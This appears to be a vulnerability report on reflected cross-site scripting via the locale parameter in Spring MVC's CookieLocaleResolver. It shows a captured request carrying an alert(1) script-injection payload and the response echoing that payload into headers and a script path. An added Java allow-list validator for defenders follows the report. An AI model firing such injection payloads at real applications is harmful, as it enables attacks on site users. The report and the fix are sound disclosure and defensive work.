Description
In my current work, I have discovered many web applications using the CookieLocaleResolver and, as a consequence, vulnerable to reflected cross-site scripting attacks.
It occurs because the user-controllable GET request parameter language is not properly validated. As a result, it is possible to inject arbitrary JavaScript into the application's response.
I'm not sure if it is a Spring MVC flaw and the exact affected release.
*EDIT*: It concerns Spring Web MVC and NOT Spring ROO but I cannot find the related component.
Find below a real-world HTTP request and response extracted from an internal web application:
HTTP request
GET /*CENSORED*/test/frontoffice/welcome.do?locale=en"><script>alert(1)</script>7767e2a3bc6 HTTP/1.1
Host: *CENSORED*:1031
Cookie: JSESSIONID=Rv62Q9JS8CPDD1LqNMV1M77RzFBN9GVMNJBfd1WKSHgFNNDLyzS7!115391691; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en
Connection: keep-alive
HTTP response snippet
HTTP/1.1 200 OK
Date: Mon, 21 Jan 2013 09:24:56 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE= en"><script>alert(1)</script>7767e2a3bc6; expires=Sat, 08-Feb-2081 12:39:06 GMT; path=/
Content-Language: en"><script>alert(1)</script>7767e2a3bc6
X-Powered-By: Servlet/2.5 JSP/2.1
(...)
<script type="text/javascript" src="/*CENSORED*/test/frontoffice/scripts/ergonomics/jsCalendar/lang/calendar-en"><script>alert(1)</script>7767e2a3bc6.js"></script>
Please find enclosed a Maven project including a JUnit test with spring-webmvc and spring-test 3.2.0.RELEASE.
Best regards
Omar EL MANDOUR
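The report's root cause is that the raw `locale` parameter is turned into a `java.util.Locale` and then written back into the `Set-Cookie` and `Content-Language` headers and into a script path without being checked. The following is an added example for defenders, not part of the report, of the enclosed Maven project, or of Spring's own code: a hypothetical `LocaleParamValidator` helper that accepts only syntactically well-formed locale strings that are also on the application's allow-list of supported locales, so anything else is dropped before it reaches a `LocaleResolver`. The allow-list contents and the class name are assumptions; the rejected payload is the one from the report.

```java
import java.util.Locale;
import java.util.Set;
import java.util.regex.Pattern;

/**
 * Hypothetical helper (not Spring code): validate a user-supplied locale
 * parameter before handing it to a LocaleResolver or echoing it in a header.
 */
public final class LocaleParamValidator {

    // Syntactic check: a language of 2-8 letters, optionally followed by up to
    // two "_" or "-" separated subtags of letters/digits. Quotes, angle brackets,
    // semicolons and whitespace can never match, so header or attribute breakouts fail here.
    private static final Pattern LOCALE_SYNTAX =
            Pattern.compile("^[A-Za-z]{2,8}([_-][A-Za-z0-9]{1,8}){0,2}$");

    // Allow-list of locales the application actually ships translations for (constructed sample).
    private static final Set<String> SUPPORTED = Set.of("en", "en_US", "fr", "fr_FR", "de");

    private LocaleParamValidator() {}

    /**
     * Returns the matching supported Locale, or null if the parameter is malformed
     * or not supported. Callers keep the current locale when null is returned.
     */
    public static Locale parseOrNull(String raw) {
        if (raw == null || !LOCALE_SYNTAX.matcher(raw).matches()) {
            return null;
        }
        String[] parts = raw.replace('-', '_').split("_");
        Locale locale;
        switch (parts.length) {
            case 1:  locale = new Locale(parts[0]); break;
            case 2:  locale = new Locale(parts[0], parts[1]); break;
            default: locale = new Locale(parts[0], parts[1], parts[2]); break;
        }
        // Locale normalises case (language lower, country upper), so "EN-us" becomes "en_US".
        return SUPPORTED.contains(locale.toString()) ? locale : null;
    }

    public static void main(String[] args) {
        // Payload from the report: the Locale constructor itself does not reject it,
        // which is why a resolver that trusts the parsed value reflects it verbatim.
        String payload = "en\"><script>alert(1)</script>7767e2a3bc6";
        System.out.println("Locale constructor accepts it: " + new Locale(payload).toString().equals(payload));

        // With the allow-list in front of the resolver, the same payload is dropped ...
        System.out.println("Validator result for payload : " + parseOrNull(payload));
        // ... while a legitimate, supported value still goes through.
        System.out.println("Validator result for fr-FR   : " + parseOrNull("fr-FR"));
        // Well-formed but unsupported locales are also rejected, so only known values reach headers.
        System.out.println("Validator result for pt_BR   : " + parseOrNull("pt_BR"));
    }
}
```

Running `main` prints `true`, `null`, `fr_FR` and `null`. Wiring this in front of whatever sets the locale (for example in a `HandlerInterceptor` that reads the request parameter) means the `Set-Cookie`, `Content-Language` and any locale-derived resource path in the response can only ever contain one of the allow-listed strings; the same check is also a cheap unit test to add alongside the report's JUnit test.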